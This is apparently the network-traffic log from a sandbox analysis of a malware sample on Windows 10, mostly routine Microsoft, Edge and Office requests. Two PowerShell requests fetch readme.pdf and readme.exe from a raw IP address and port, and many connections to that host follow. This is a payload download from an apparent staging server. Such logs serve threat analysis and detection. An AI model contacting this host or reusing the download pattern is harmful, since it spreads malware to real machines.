                      Source: global trafficHTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1733921603&P2=404&P3=2&P4=ZIvu7wxXJfTdiYCEjh%2bpUqdpN0YGnzWKN%2fzhMh4n7EnQrCjEd46ENEFi81ZF0oVELsrsbXGChzfLS5WtNCyd7g%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: vrdgwOh3Q8lJkzwFjOBobQSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
                      Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
                      Source: global trafficHTTP traffic detected: POST /ppsecure/deviceaddcredential.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 7642Host: login.live.com
                      Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
                      Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
                      Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4775Host: login.live.com
                      Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4775Host: login.live.com
                      Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4775Host: login.live.com
                      Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4775Host: login.live.com
                      Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4775Host: login.live.com
                      Source: global trafficHTTP traffic detected: GET /uploads/team-1/readme.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 95.169.201.100:18960Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /uploads/team-1/readme.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 95.169.201.100:18960
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /work/api/v2/tenant/my/settingswithflights?&clienttype=edge-omnibox HTTP/1.1Host: business.bing.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /api/v1/user/token/microsoftgraph?&clienttype=edge-omnibox HTTP/1.1Host: business.bing.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1733921603&P2=404&P3=2&P4=ZIvu7wxXJfTdiYCEjh%2bpUqdpN0YGnzWKN%2fzhMh4n7EnQrCjEd46ENEFi81ZF0oVELsrsbXGChzfLS5WtNCyd7g%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: vrdgwOh3Q8lJkzwFjOBobQSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=HWvNagD4okpHDot&MD=86O4NVBB HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                      Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
